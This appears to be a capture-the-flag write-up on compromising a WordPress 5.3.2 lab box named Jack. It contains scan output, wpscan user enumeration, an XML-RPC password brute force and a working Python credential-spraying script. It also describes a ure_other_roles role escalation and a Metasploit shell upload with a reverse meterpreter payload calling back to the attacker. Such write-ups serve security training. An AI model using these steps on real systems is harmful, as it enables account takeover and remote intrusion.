Jack

In today’s Game we are going to explore hacking into a WordPress site to obtain low-privileged user access, then find credentials to pivot to a normal user on the box, and then enumerate to find some interesting things with Python that allow us to PrivEsc to root and own this box.

Initial Enumeration

Get a rust scan:

✘ kali@kalia  ~/curr  rustscan -a $IP
[sudo] password for kali: 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.13.248:22
Open 10.10.13.248:80
[~] Starting Script(s)
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-11 23:04 UTC
Initiating Ping Scan at 23:04
Scanning 10.10.13.248 [2 ports]
Completed Ping Scan at 23:04, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:04
Completed Parallel DNS resolution of 1 host. at 23:04, 0.01s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 23:04
Scanning 10.10.13.248 [2 ports]
Discovered open port 22/tcp on 10.10.13.248
Discovered open port 80/tcp on 10.10.13.248
Completed Connect Scan at 23:04, 0.28s elapsed (2 total ports)
Nmap scan report for 10.10.13.248
Host is up, received syn-ack (0.27s latency).
Scanned at 2023-11-11 23:04:00 UTC for 1s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds

Looks like this is WordPress v5.3.2.

There is a robots.txt disallowed entry for wp-admin.

Now checking out the website on port 80; here is the source of the home page:

<!doctype html>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="profile" href="https://gmpg.org/xfn/11">

    <title>Jack&#039;s Personal Site &#8211; Blog for Jacks writing adventures.</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Jack&#039;s Personal Site &raquo; Feed" href="http://jack.thm/index.php/feed/" />
<link rel="alternate" type="application/rss+xml" title="Jack&#039;s Personal Site &raquo; Comments Feed" href="http://jack.thm/index.php/comments/feed/" />
    <link rel='stylesheet' id='wp-block-library-css'  href='http://jack.thm/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-theme-css'  href='http://jack.thm/wp-includes/css/dist/block-library/theme.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='online-portfolio-googleapis-css'  href='//fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i|Work+Sans:100,200,300,400,500,600,700,800,900' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/font-awesome/css/all.min.css?ver=5.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/css/bootstrap.min.css?ver=4.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='animate-css'  href='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/animate/animate.min.css?ver=3.5.2' type='text/css' media='all' />
<link rel='stylesheet' id='owlcarousel-css-css'  href='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/assets/owl.carousel.min.css?ver=2.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='lightbox-css'  href='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/css/lightbox.min.css?ver=2.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='online-portfolio-style-css'  href='http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='online-portfolio-block-front-styles-css'  href='http://jack.thm/wp-content/themes/online-portfolio/inc/gutenberg/gutenberg-front.css?ver=1.0' type='text/css' media='all' />
<script type='text/javascript' src='http://jack.thm/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='http://jack.thm/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/js/theia-sticky-sidebar.js?ver=4.5.0'></script>
<link rel='https://api.w.org/' href='http://jack.thm/index.php/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://jack.thm/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://jack.thm/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.3.2" />
<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style></head>

<body class="home blog at-sticky-sidebar hfeed no-sidebar">

<div id="page" class="site">
    <a class="skip-link screen-reader-text" href="#content">
        Skip to content</a>

<!--==========================
  Header
============================-->


<header id="header">
        <div class="main-header">
        <div class="container-fluid">

            <div id="logo" class="pull-left">
                                        <h1 class="site-title">

                            <a href="http://jack.thm/" rel="home">Jack&#039;s Personal Site</a>
                        </h1>
                                            <p class="site-description">Blog for Jacks writing adventures.</p>
                                        <!-- Uncomment below if you prefer to use an image logo -->
                <!-- <a href="#intro"><img src="img/logo.png" alt="" title="" /></a>-->
            </div>

            <nav id="nav-menu-container">


            </nav><!-- #nav-menu-container -->
        </div>

    </div>
</header><!-- #header -->

<main id="main">


    <div class="inner-header-banner overlay bg-img"
         style="background-image: url(http://192.168.1.122/wp-content/uploads/2020/01/cropped-jacktypewriter.jpg);">
        <div class="container">
            <header class="section-header">

            <h3>Latest Blog</h3>



                    <div class="breadcrumbs">
                        <div class="container">
                            <div class="breadcrumb-trail breadcrumbs" arial-label="Breadcrumbs" role="navigation">
                                <ol class="breadcrumb trail-items">
                                    <li><nav role="navigation" aria-label="Breadcrumbs" class="breadcrumb-trail breadcrumbs" itemprop="breadcrumb"><h2 class="trail-browse">Browse</h2><ul class="trail-items" itemscope itemtype="http://schema.org/BreadcrumbList"><meta name="numberOfItems" content="1" /><meta name="itemListOrder" content="Ascending" /><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item trail-end"><span itemprop="name">Home</span><meta itemprop="position" content="1" /></li></ul></nav></li>
                                </ol>
                            </div>
                        </div>
                    </div>

            </header>
        </div>
    </div>

        <div id="content" class="site-content single-ample-page">
        <div class="container  clearfix">
                            <div class="row">                   <!-- Start primary content area -->
                    <div id="primary" class="content-area">
                        <main id="main" class="site-main" role="main">


<div class="col-md-12">
    <article id="post-9"
             class="post type-post status-publish has-post-thumbnail hentry" class="post-9 post type-post status-publish format-standard hentry category-uncategorized">

        <a class="post-thumbnail" href="#" aria-hidden="true" tabindex="-1">
                    </a>

        <header class="entry-header">
            <h3 class="entry-title">
                <a href="http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/" rel="bookmark">Jack is visiting Overlook Hotel in Colorado for some inspiration.</a>
            </h3>
            <div class="entry-meta">
                                            <span class="posted-on">Posted on
<a href="#" rel="bookmark">
    <time class="entry-date published updated" datetime="2018-11-25T04:36:26+00:00">January 10, 2020</time>
</a>
                                            </span>
                                                <span class="byline"> by
                                                    <span class="author vcard">
                                                    <a class="url fn n"
                                                       href="http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/">jack</a>
                                                </span>
                                            </span>
            </div><!-- .entry-meta -->
        </header><!-- .entry-header -->

        <div class="entry-content">
            <p>    Due to my recent writer&#8217;s block, I will be taking a bit of time for my family and myself at the Overlook Hotel, don&#8217;t think this will be just a vacation, I assure you, I will be working very hard&hellip;            </p>

            <a href="http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/"
               class="continue-link">Continue Reading</a>

        </div><!-- .entry-content -->

    </article>
</div>

                        </main><!-- #main -->
                    </div><!-- #primary -->

                    <div id="sidebar-primary secondary" class="widget-area sidebar" role="complementary">
                        <section  class="widget ">

<aside id="secondary" class="widget-area">
    <div class="side-bar1">
        <section id="search-2" class="widget widget_search"><form action="http://jack.thm" autocomplete="on" class="top-search">
    <input id="search" name="s" value="" type="text" placeholder="Search&hellip;&hellip;">
    <div class="search-button"><button type="submit">Search</button></div>
</form>
</section>        <section id="recent-posts-2" class="widget widget_recent_entries">      <h2 class="widget-title"><span>Recent Posts</span></h2>     <ul>
                                            <li>
                    <a href="http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/">Jack is visiting Overlook Hotel in Colorado for some inspiration.</a>
                                    </li>
                    </ul>
        </section><section id="recent-comments-2" class="widget widget_recent_comments"><h2 class="widget-title"><span>Recent Comments</span></h2><ul id="recentcomments"></ul></section><section id="archives-2" class="widget widget_archive"><h2 class="widget-title"><span>Archives</span></h2>     <ul>
                <li><a href='http://jack.thm/index.php/2020/01/'>January 2020</a></li>
        </ul>
            </section><section id="categories-2" class="widget widget_categories"><h2 class="widget-title"><span>Categories</span></h2>     <ul>
                <li class="cat-item cat-item-1"><a href="http://jack.thm/index.php/category/uncategorized/">Uncategorized</a>
</li>
        </ul>
            </section><section id="meta-2" class="widget widget_meta"><h2 class="widget-title"><span>Meta</span></h2>           <ul>
                        <li><a href="http://jack.thm/wp-login.php">Log in</a></li>
            <li><a href="http://jack.thm/index.php/feed/">Entries feed</a></li>
            <li><a href="http://jack.thm/index.php/comments/feed/">Comments feed</a></li>
            <li><a href="https://wordpress.org/">WordPress.org</a></li>           </ul>
            </section>  </div>
</aside><!-- #secondary -->
                        </section>
                    </div>

                </div>
            </div>
        </div>
</main>

    <footer id="footer">



        <div class="container">
            <div class="copyright">
                &copy; Copyright All Rights Reserved 2019           </div>
            <div class="credits">
                <a href="https://www.amplethemes.com/"
                > Design &amp; develop by AmpleThemes </a>
            </div>
        </div>
    </footer><!-- #footer -->

    <a href="#" class="back-to-top"><i class="fas fa-chevron-up"></i></a>
    <script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/js/bootstrap.bundle.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/easing/easing.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-includes/js/hoverIntent.min.js?ver=1.8.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/superfish/superfish.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/wow/wow.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/waypoints/waypoints.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/counterup/counterup.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/owl.carousel.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/isotope/isotope.pkgd.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/js/lightbox.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/touchSwipe/jquery.touchSwipe.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/js/main.js?ver=1.0.5'></script>
<script type='text/javascript' src='http://jack.thm/wp-includes/js/wp-embed.min.js?ver=5.3.2'></script>
</div>

    </body>
    </html>

Now further enumerating the WordPress site. In the page source I see a possible username, ‘jack’, as the author of the post.
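As an added example (not from the original writeup), a small Python parser that pulls the same disclosures out of saved page source: the generator meta tag, the RSD and wp-json links, asset ?ver= strings, the author vcard link, and any off-site host such as the 192.168.1.122 address in the banner style. The sample HTML is a constructed, trimmed copy of the source above.

```python
"""Extract WordPress fingerprint data from saved page source (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed sample: a trimmed copy of the markers seen in the page source above.
SAMPLE_HTML = """<!doctype html>
<html lang="en-US"><head>
<meta charset="UTF-8">
<title>Jack&#039;s Personal Site &#8211; Blog</title>
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" href="http://jack.thm/index.php/feed/" />
<link rel='stylesheet' id='wp-block-library-css' href='http://jack.thm/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' />
<link rel='stylesheet' id='online-portfolio-googleapis-css' href='//fonts.googleapis.com/css?family=Open+Sans' />
<link rel='stylesheet' id='online-portfolio-style-css' href='http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2' />
<script type='text/javascript' src='http://jack.thm/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<link rel='https://api.w.org/' href='http://jack.thm/index.php/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://jack.thm/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 5.3.2" />
</head><body>
<div class="inner-header-banner" style="background-image: url(http://192.168.1.122/wp-content/uploads/2020/01/cropped-jacktypewriter.jpg);"></div>
<span class="author vcard"><a class="url fn n" href="http://jack.thm/index.php/2020/01/10/post/">jack</a></span>
<li><a href="http://jack.thm/wp-login.php">Log in</a></li>
</body></html>
"""


class WPFingerprintParser(HTMLParser):
    """Collects version, endpoint, author and host disclosures from one page."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host
        self.generator = None        # <meta name="generator">
        self.xmlrpc = None           # RSD link pointing at xmlrpc.php
        self.rest_api = None         # rel="https://api.w.org/" -> wp-json root
        self.asset_versions = {}     # asset path -> ?ver= value (site assets only)
        self.authors = set()         # text of author vcard links
        self.hosts = set()           # every host the page references
        self._in_author = False

    def _note_url(self, url):
        if not url:
            return
        parts = urlparse(url)
        if parts.netloc:
            self.hosts.add(parts.netloc)
        ver = parse_qs(parts.query).get("ver")
        if ver and parts.netloc in ("", self.site_host):
            self.asset_versions[parts.path] = ver[0]

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        rel = (a.get("rel") or "").lower()
        if tag == "meta" and a.get("name") == "generator":
            self.generator = a.get("content")
        elif tag == "link":
            if rel == "edituri" and "xmlrpc.php" in (a.get("href") or ""):
                self.xmlrpc = a["href"]
            elif rel == "https://api.w.org/":
                self.rest_api = a.get("href")
            self._note_url(a.get("href"))
        elif tag == "script":
            self._note_url(a.get("src"))
        elif tag == "a":
            self._note_url(a.get("href"))
            self._in_author = "url fn n" in (a.get("class") or "")
        # Inline CSS backgrounds may reference another host (here an internal IP).
        for url in re.findall(r"url\(([^)]+)\)", a.get("style") or ""):
            self._note_url(url.strip("'\" "))

    def handle_data(self, data):
        if self._in_author and data.strip():
            self.authors.add(data.strip())

    def handle_endtag(self, tag):
        if tag == "a":
            self._in_author = False


def fingerprint(html, site_host="jack.thm"):
    """Parse one page and return the disclosures a defender would want to remove."""
    p = WPFingerprintParser(site_host)
    p.feed(html)
    p.close()
    return {
        "generator": p.generator,
        "xmlrpc": p.xmlrpc,
        "rest_api": p.rest_api,
        "asset_versions": p.asset_versions,
        "authors": sorted(p.authors),
        "foreign_hosts": sorted(h for h in p.hosts if h != site_host),
    }


if __name__ == "__main__":
    for key, value in fingerprint(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```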

Let me get a wpscan going.

 ✘ kali@kalia  ~/curr  wpscan -e u,ap --url http://jack.thm                                                       
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.13.248]
[+] Started: Sun Nov 12 08:30:35 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <==============================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] jack
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://jack.thm/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wendy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] danny
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 12 08:30:55 2023
[+] Requests Done: 59
[+] Cached Requests: 9
[+] Data Sent: 14.86 KB
[+] Data Received: 371.931 KB
[+] Memory used: 242.645 MB
[+] Elapsed time: 00:00:20

I see it found a few interesting things: XML-RPC is enabled, the uploads directory has listing enabled, the WordPress version is an outdated 5.3.2, and three users were identified (jack, wendy, danny).

I made a users.txt file with the 3 users and then ran a brute-force password attack against them:

 kali@kalia  ~/curr  wpscan --url http://jack.thm/ -t 3 -U users.txt --passwords toplikeymunged.txt     
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.13.248]
[+] Started: Sun Nov 12 09:42:00 2023

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:14 <=============================================> (137 / 137) 100.00% Time: 00:00:14

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - wendy / changelater                                                                                             
Trying danny / starwars Time: 00:02:06 <====================================             > (645 / 867) 74.39%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: wendy, Password: changelater

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 12 09:44:25 2023
[+] Requests Done: 785
[+] Cached Requests: 39
[+] Data Sent: 363.358 KB
[+] Data Received: 445.969 KB
[+] Memory used: 283.125 MB
[+] Elapsed time: 00:02:24

WPScan found one valid password, for wendy, by brute-forcing xmlrpc.php (the endpoint it flagged as enabled above).

NOTE: If you are struggling with this one: you won’t find the password in rockyou.txt. I finally used a wordlist I built by munging some of the most commonly used passwords.
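What WPScan’s “password attack on Xmlrpc” actually does on the wire, as an added example that is not part of the original post: it calls the wp.getUsersBlogs XML-RPC method, which takes a username and password and answers with the user’s blog list when they are right or with fault 403 when they are wrong. The two response bodies are constructed by hand from that behaviour so the code runs offline; the host jack.thm and the three usernames come from the post, and canned_server stands in for the real site.

```python
"""Added example: a WordPress XML-RPC credential check of the kind WPScan runs.
Constructed sample responses; not code from the original post."""
import urllib.request
import xmlrpc.client

# Constructed sample: what WordPress returns for a valid login.
SUCCESS_RESPONSE = b"""<?xml version="1.0"?>
<methodResponse><params><param><value><array><data>
<value><struct>
<member><name>isAdmin</name><value><boolean>0</boolean></value></member>
<member><name>url</name><value><string>http://jack.thm/</string></value></member>
<member><name>blogid</name><value><string>1</string></value></member>
<member><name>blogName</name><value><string>Jack</string></value></member>
<member><name>xmlrpc</name><value><string>http://jack.thm/xmlrpc.php</string></value></member>
</struct></value>
</data></array></value></param></params></methodResponse>"""

# Constructed sample: what WordPress returns for a bad login.
FAULT_RESPONSE = b"""<?xml version="1.0"?>
<methodResponse><fault><value><struct>
<member><name>faultCode</name><value><int>403</int></value></member>
<member><name>faultString</name><value><string>Incorrect username or password.</string></value></member>
</struct></value></fault></methodResponse>"""


def build_login_request(username, password):
    """Serialise a wp.getUsersBlogs call; this is the body POSTed to xmlrpc.php."""
    return xmlrpc.client.dumps((username, password), methodname="wp.getUsersBlogs").encode()


def classify_response(body):
    """Map a raw XML-RPC response to ('valid', is_admin), ('invalid', None) or
    ('blocked', None) when the endpoint refuses the method with another fault."""
    try:
        (blogs,), _ = xmlrpc.client.loads(body)
    except xmlrpc.client.Fault as fault:
        return ("invalid", None) if fault.faultCode == 403 else ("blocked", None)
    return ("valid", any(bool(b.get("isAdmin")) for b in blogs))


def http_post(url, body):
    """Real transport; only used when no canned sender is supplied."""
    req = urllib.request.Request(url, data=body, headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read()


def spray(url, usernames, passwords, post=http_post):
    """Try every password for every user, stopping per user on the first hit.
    Returns {username: password} for the valid pairs found."""
    found = {}
    for user in usernames:
        for password in passwords:
            status, _ = classify_response(post(url, build_login_request(user, password)))
            if status == "blocked":
                raise RuntimeError("xmlrpc.php rejected wp.getUsersBlogs; stop and read the fault")
            if status == "valid":
                found[user] = password
                break
    return found


def canned_server(valid_pairs):
    """Stand-in for jack.thm: parses the request the way WordPress would and
    answers from a constructed credential table."""
    def post(url, body):
        (user, password), method = xmlrpc.client.loads(body)
        if method != "wp.getUsersBlogs":
            raise ValueError("unexpected method " + str(method))
        return SUCCESS_RESPONSE if valid_pairs.get(user) == password else FAULT_RESPONSE
    return post


if __name__ == "__main__":
    fake = canned_server({"wendy": "changelater"})
    print(spray("http://jack.thm/xmlrpc.php", ["jack", "wendy", "danny"],
                ["password", "starwars", "changelater"], post=fake))
```

The point of classify_response is the third outcome: if xmlrpc.php answers with a fault other than 403 (the method disabled, a WAF, a lockout plugin), keep spraying and you only burn attempts, so the spray stops instead.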

Initial Web Login

Logging in I see this:

So Wendy is not an administrator. Pages such as the theme editor (where you could edit 404.php) are off limits to this role, so dropping a PHP reverse shell through the dashboard isn’t possible yet.

Checking for exploits here, I saw a hint on the THM site about ‘ure_other_roles’.

Escalate to Web Admin

After a fair bit of reading, I found that ure_other_roles is a request parameter handled by the User Role Editor plugin (the plugin directory listing later in this post shows user-role-editor is installed). Vulnerable versions accept it on an ordinary profile update, so any logged-in user can hand themselves extra roles: open the profile page, capture the request in Burp Suite when you click Update Profile, append &ure_other_roles=administrator to the POST body, forward it, and forward everything else untouched:

Now we see we have access to the other pages:

While we are here, let’s change Wendy’s role to Administrator in her user settings so the elevation survives a new login:

Now if we have to log back in we’ll have admin. I tried this once to be sure and got an email verification page, so test it yourself before relying on it.

Initial Box Access

Now that Wendy is an administrator, Metasploit’s wp_admin_shell_upload module (it installs a throwaway plugin, which is why it needs admin credentials) gets us a Meterpreter shell:

 kali@kalia  ~/curr  msfconsole -q
msf6 > search wp_admin_shell

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/unix/webapp/wp_admin_shell_upload  2015-02-21       excellent  Yes    WordPress Admin Shell Upload


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload

msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                         using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.11.62    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD changelater
PASSWORD => changelater
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS http://jack.thm/
RHOSTS => http://jack.thm/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME wendy
USERNAME => wendy
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST tun0
LHOST => 10.19.10.150
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURL /wp-admin
[!] Unknown datastore option: TARGETURL. Did you mean TARGET?
TARGETURL => /wp-admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wp-admin
TARGETURI => /wp-admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/gLvyBKxzbo/RrpHIxAzSU.php...
[*] Sending stage (39927 bytes) to 10.10.13.248
[+] Deleted RrpHIxAzSU.php
[+] Deleted gLvyBKxzbo.php
